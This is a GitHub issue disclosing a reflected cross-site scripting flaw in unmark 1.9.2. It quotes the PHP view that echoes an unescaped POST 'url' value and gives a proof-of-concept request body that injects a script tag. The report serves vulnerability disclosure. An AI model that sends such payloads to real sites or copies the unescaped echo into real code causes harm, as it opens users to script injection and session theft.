XSS vulnerability (in version older version 1.9.2)

Hello,

I would like to report for a xss vulnerability in unmark-1.9.2.

The path of the vulnerability.

In file application/views/marks/add_by_url.php

```php
if ( $_POST ) :										// Line 3
    $url = $_POST['url'];							// Line 7
    echo '<p><strong>URL:</strong>' . $url . '</p>';	// Line 8
```


We see that there is no check between the input  $_POST["url"] and the output(Line 8)

Thus the XSS will happen at `echo '<p><strong>URL:</strong>' . $url . '</p>';`

Poc:

POST  /marks/add_by_url 

`add_from_url=1&url=</p><script>alert('xss')</script>`

Manual verification:

![1](https://github.com/cdevroe/unmark/assets/134520528/1e797aad-4120-4788-9efa-21c5e7f58fc7)

![2](https://github.com/cdevroe/unmark/assets/134520528/7b87ab42-5e79-415b-bcca-bdbc92082df5)




Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

XSS vulnerability (in version older version 1.9.2) #290

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

XSS vulnerability (in version older version 1.9.2) #290

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions